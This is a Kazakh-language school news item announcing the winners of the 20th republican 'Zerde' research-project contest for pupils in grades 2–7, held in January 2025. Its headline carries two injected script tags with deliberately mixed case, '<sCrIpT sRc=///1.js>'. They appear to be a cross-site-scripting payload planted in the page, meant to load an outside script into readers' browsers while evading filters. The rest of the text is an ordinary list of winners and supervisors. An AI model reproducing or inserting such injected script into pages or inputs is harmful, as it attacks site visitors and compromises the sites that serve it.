2-7 сынып оқушылары арасында «Зерде» XX республикалық зерттеу жобалары байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
30.01.2025
Бурабай ауданы, Щучинск қаласындағы «Балдәурен» республикалық оқу-сауықтыру орталығының базасында 2025 жылғы 28 - 30 қаңтар аралығында жаратылыстану-математикалық бағыт бойынша 2-7 сынып оқушылары арасында «Зерде» XX республикалық зерттеу жобалары байқауының қорытынды кезеңі өтті.
І - дәрежелі дипломмен «Физика, космос» секциясы бойынша Кадирбек Аяжан - Целиноград ауданы, Қоянды ауылының №2 жалпы орта білім беретін мектебінің 3-сынып оқушысы марапатталды.
Жетекшісі: Әлібай Жемісгүл
Грамотамен марапатталды:
«Туризм және спорт» секциясы бойынша Шахмарданова Жанель - Целиноград ауданы, Қабанбай батыр ауылының жалпы орта білім беретін мектебінің 6-сынып оқушысы.
Жетекшісі: Штарк Евгения Владимировна
Жас зерттеушілерімізді шын жүректен құттықтаймыз және жаңа жеңістер тілейміз!!!